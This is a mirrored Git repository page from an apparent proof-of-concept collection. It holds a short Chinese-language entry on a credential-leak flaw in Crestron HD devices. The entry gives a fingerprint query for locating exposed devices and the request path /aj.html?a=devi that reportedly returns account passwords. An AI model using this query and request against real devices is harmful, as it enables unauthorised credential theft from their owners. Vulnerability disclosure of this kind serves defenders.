admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 05:54:14 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

757 B

Raw Blame History

CrestronHD aj.html存在账号密码泄漏漏洞

一、漏洞描述

Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息

二、影响版本

Crestron HD

三、资产测绘

app="Crestron-HD-RX-201-C-E"

四、漏洞复现

/aj.html?a=devi

更新: 2024-08-12 17:48:53
原文: https://www.yuque.com/xiaokp7/ocvun2/cdvmx13vg4wd8fyr